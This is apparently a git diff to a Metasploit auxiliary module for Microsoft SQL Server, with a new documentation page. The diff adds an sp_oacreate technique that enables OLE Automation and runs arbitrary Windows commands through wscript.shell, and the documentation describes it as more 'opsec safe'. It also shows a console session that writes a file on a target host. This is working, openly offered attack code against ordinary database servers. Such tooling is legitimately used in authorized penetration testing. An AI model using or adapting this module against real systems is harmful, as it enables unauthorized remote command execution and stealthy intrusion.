diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 8fec530ce1cd..d04ddbf9684e 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -5166,7 +5166,7 @@
     "needs_cleanup": false
   },
   "auxiliary_admin/mssql/mssql_exec": {
-    "name": "Microsoft SQL Server xp_cmdshell Command Execution",
+    "name": "Microsoft SQL Server xp_cmdshell / sp_oacreate Command Execution",
     "fullname": "auxiliary/admin/mssql/mssql_exec",
     "aliases": [
 
diff --git a/documentation/modules/auxiliary/admin/mssql/mssql_exec.md b/documentation/modules/auxiliary/admin/mssql/mssql_exec.md
new file mode 100644
index 000000000000..a2ae1ff6f66e
--- /dev/null
+++ b/documentation/modules/auxiliary/admin/mssql/mssql_exec.md
@@ -0,0 +1,35 @@
+## Description
+
+This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is required to use this module. The sp_oacreate function is used in metasploit to rebuild the xp_cmdshell stored procedure but can be used directly to get code execution which is the more opsec safe way.
+
+## Verification Steps
+
+1. Do: ```use use admin/mssql/mssql_exec```
+2. Do: ```set USERNAME [username1]```
+3. Do: ```set PASSWORD [password1]```
+3. Do: ```set TECHNIQUE sp_oacreate``` (optional, default is xp_cmdshell)
+4. Do: ```set RHOSTS [IP]```
+5. Do: ```set CMD [command]```
+6. Do: ```run```
+
+## Scenarios
+
+```
+msf > use use use admin/mssql/mssql_exec
+msf auxiliary(mssql_exec) > set USERNAME username1
+USERNAME => username1
+msf auxiliary(mssql_exec) > set PASSWORD password1
+PASSWORD => password1
+msf auxiliary(mssql_exec) > set TECHNIQUE sp_oacreate
+TECHNIQUE => sp_oacreate
+msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
+RHOST => 192.168.1.195
+msf auxiliary(mssql_exec) > set CMD cmd.exe /c echo OWNED > C:\owned.txt
+CMD => cmd.exe /c echo OWNED > C:\owned.txt
+msf auxiliary(mssql_exec) > run
+
+[*] 192.168.1.195:1433 - Enable advanced options and ole automation procedures
+[*] 192.168.1.195:1433 - Executing command using sp_oacreate
+[*] Auxiliary module execution completed
+msf auxiliary(mssql_exec_oacreate) >
+```
\ No newline at end of file
diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb
index 6cb62617211f..6eeb394b1b08 100644
--- a/modules/auxiliary/admin/mssql/mssql_exec.rb
+++ b/modules/auxiliary/admin/mssql/mssql_exec.rb
@@ -7,27 +7,58 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Microsoft SQL Server xp_cmdshell Command Execution',
-      'Description'    => %q{
-        This module will execute a Windows command on a MSSQL/MSDE instance
-      via the xp_cmdshell procedure. A valid username and password is required
-      to use this module
-      },
-      'Author'         => [ 'tebo <tebo[at]attackresearch.com>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
-        ]
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SQL Server Command Execution',
+        'Description' => %q{
+          This module will execute a Windows command on a MSSQL/MSDE instance
+          via the xp_cmdshell (default) or the sp_oacreate procedure (more opsec safe, no output, no temporary data table).
+          A valid username and password is required to use this module.
+        },
+        'Author' =>
+          [
+            'tebo <tebo[at]attackresearch.com>',
+            'arcc <pw[at]evait.de>'
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
+            [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
+          ]
+      )
+    )
 
-    register_options( [
-      OptString.new('CMD', [ false, 'Command to execute',  'cmd.exe /c echo OWNED > C:\\owned.exe']),
+    register_options([
+      OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
+      OptEnum.new('TECHNIQUE', [true, 'Technique that used for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
     ])
   end
 
   def run
-    mssql_xpcmdshell(datastore['CMD'], true) if mssql_login_datastore
+    return unless mssql_login_datastore
+
+    technique = datastore['TECHNIQUE']
+    case technique
+    when 'xp_cmdshell'
+      begin
+        mssql_xpcmdshell(datastore['CMD'], true)
+      rescue RuntimeError
+        print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
+        mssql_spoacreate
+      end
+    when 'sp_oacreate'
+      mssql_spoacreate
+    end
+  end
+
+  def mssql_spoacreate
+    doprint = datastore['VERBOSE']
+    print_status('Enable advanced options and ole automation procedures')
+    mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
+    mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
+    print_good('Executing command using sp_oacreate. No output will be displayed.')
+    mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
   end
 end